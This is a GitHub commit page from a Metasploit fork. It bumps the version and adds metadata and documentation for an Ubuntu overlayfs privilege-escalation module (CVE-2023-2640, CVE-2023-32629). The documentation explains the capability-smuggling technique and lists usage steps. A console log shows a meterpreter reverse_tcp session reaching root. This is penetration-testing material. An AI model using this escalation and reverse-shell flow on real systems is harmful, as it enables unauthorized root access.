Skip to content

Commit

Permalink
Merge remote-tracking branch 'upstream/master'
Browse files Browse the repository at this point in the history
  • Loading branch information
certcc-ghbot committed Dec 19, 2024
2 parents 7fb4c3e + e2a248e commit 0dcf866
Show file tree
Hide file tree
Showing 6 changed files with 412 additions and 3 deletions.
2 changes: 1 addition & 1 deletion Gemfile.lock
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.4.41)
metasploit-framework (6.4.42)
aarch64
abbrev
actionpack (~> 7.0.0)
Expand Down
2 changes: 1 addition & 1 deletion LICENSE_GEMS
Original file line number Diff line number Diff line change
Expand Up @@ -88,7 +88,7 @@ memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.3, "New BSD"
metasploit-credential, 6.0.11, "New BSD"
metasploit-framework, 6.4.41, "New BSD"
metasploit-framework, 6.4.42, "New BSD"
metasploit-model, 5.0.2, "New BSD"
metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.5, "New BSD"
Expand Down
65 changes: 65 additions & 0 deletions db/modules_metadata_base.json
Original file line number Diff line number Diff line change
Expand Up @@ -88994,6 +88994,71 @@

]
},
"exploit_linux/local/gameoverlay_privesc": {
"name": "GameOver(lay) Privilege Escalation and Container Escape",
"fullname": "exploit/linux/local/gameoverlay_privesc",
"aliases": [

],
"rank": 300,
"disclosure_date": "2023-07-26",
"type": "exploit",
"author": [
"g1vi",
"h00die",
"bwatters-r7",
"gardnerapp"
],
"description": "This module exploits the use of unsafe functions in a number of Ubuntu kernels\n utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux\n kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent\n changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is\n called during ovl_do_setxattr without calling the intermediate safety function\n vfs_setxattr. Ultimatly this module allows for root access to be achieved by\n writing setuid capabilities to a file which are not sanitized after being unioned\n with the upper mounted directory.",
"references": [
"URL-https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/",
"URL-https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629",
"URL-https://www.cvedetails.com/cve/CVE-2023-2640/",
"URL-https://www.cvedetails.com/cve/CVE-2023-32629/",
"URL-https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability",
"CVE-2023-32629",
"CVE-2023-2640"
],
"platform": "Linux,Unix",
"arch": "",
"rport": null,
"autofilter_ports": [

],
"autofilter_services": [

],
"targets": [
"Linux_Binary",
"Linux_Command"
],
"mod_time": "2024-12-17 16:52:24 +0000",
"path": "/modules/exploits/linux/local/gameoverlay_privesc.rb",
"is_install_path": true,
"ref_name": "linux/local/gameoverlay_privesc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": [

]
},
"exploit_linux/local/glibc_ld_audit_dso_load_priv_esc": {
"name": "glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation",
"fullname": "exploit/linux/local/glibc_ld_audit_dso_load_priv_esc",
Expand Down
157 changes: 157 additions & 0 deletions documentation/modules/exploit/linux/local/gameoverlay_privesc.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,157 @@
## Description

CVE-2023-2640 and CVE-2023-32629 are vulnerabilities that allow for the arbitrary setting of
capabilities while overlaying filesystems. On most Linux Kernels during the execution of
`ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a
way that limits them to the current namespace. However, on some versions of the Ubuntu kernel
`_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`.

When a new namespace is created the user will technically be "root" within that given
namespace. This module will take advantage of this by setting the `CAP_SETUID` capability
on a system binary. It will then perform filesystem overlay, copying the binary into the lower
directory. Because of the flaws described above when the binary is transferred into the upper
directory its capabilities will not be sanitized and persist in the "normal" namespace.

## Vunerable Application

These vulnerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases
and kernel versions, as described in the list below.

Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629)

Ubuntu 22.10 (Kinetic Kudu), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)

Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)

Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 6.2.0, (CVE-2023-2640 & CVE-2023-32629)

Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629)

Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629)

The user can download a vulnerable version, for example:

```
sudo apt update
sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
reboot
```
While testing, @bwatters7 mentioned taking the system offline as this appears to be patched automatically.
Be sure to take the system offline to prevent the vulnerabilities from silently being patched.

This module has successfully been tested on the following:

Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic

Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws

## Verification Steps

1). Start `msfconsole`

2). Get a session on a vulnerable system

3). Use `exploit/linux/local/gameoverlay_privesc`

4). Optional: choose target for payload, either linux binary (0) or [li|u]nix command (1)
`set target 1`

5). Set session `set session [SESSION]`

5). Do. `run`

6). You should get a new session running as root.

## Options

### Payload File Name
Name of the file storing the payload, default is random.

### Writable Dir
The name of a directory with write permissions, default is `/tmp`. This will be where the
payload file will be created if necessary. Additionally during the exploit a series of directories will be
created here to perform the filesystem overlaying.

## Scenarios

You have a non-root session on one of the systems described above. Please note that this
module will automatically run checks to determine if the system is vulnerable, you can disable
this with `set AutoCheck False`.

```
msf6 exploit(linux/local/gameoverlay_privesc) >
[*] Sending stage (3045380 bytes) to 10.5.132.129
[*] Meterpreter session 3 opened (10.5.135.201:4585 -> 10.5.132.129:33504) at 2024-12-18 14:02:15 -0600
msf6 exploit(linux/local/gameoverlay_privesc) > set session 3
session => 3
msf6 exploit(linux/local/gameoverlay_privesc) > show options
Module options (exploit/linux/local/gameoverlay_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
PayloadFileName pSueaCXrnzH yes Name of payload
SESSION 3 yes The session to run this module on
WritableDir /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux_Binary
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/gameoverlay_privesc) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory to store payload: /tmp/ODBpneOXk/
[*] Creating directory /tmp/ODBpneOXk/
[*] /tmp/ODBpneOXk/ created
[*] Creating directory /tmp/ODBpneOXk/
[*] Creating directory /tmp/ODBpneOXk/
[*] /tmp/ODBpneOXk/ created
[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/
[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/
[*] /tmp/ODBpneOXk/bmbtPAX/ created
[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/
[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/
[*] /tmp/ODBpneOXk/JtNbwLXJKw/ created
[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/
[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/
[*] /tmp/ODBpneOXk/hEhbByWL/ created
[*] Creating directory /tmp/ODBpneOXk/yvvSFre/
[*] Creating directory /tmp/ODBpneOXk/yvvSFre/
[*] /tmp/ODBpneOXk/yvvSFre/ created
[*] Writing payload: /tmp/ODBpneOXk/pSueaCXrnzH
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.132.129
[*] rm: cannot remove '/tmp/ODBpneOXk/yvvSFre/': Device or resource busy
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.132.129:44400) at 2024-12-18 14:02:42 -0600
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 10.5.132.129
OS : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
2 changes: 1 addition & 1 deletion lib/metasploit/framework/version.rb
Original file line number Diff line number Diff line change
Expand Up @@ -32,7 +32,7 @@ def self.get_hash
end
end

VERSION = "6.4.41"
VERSION = "6.4.42"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash
Expand Down
Loading

0 comments on commit 0dcf866

Please sign in to comment.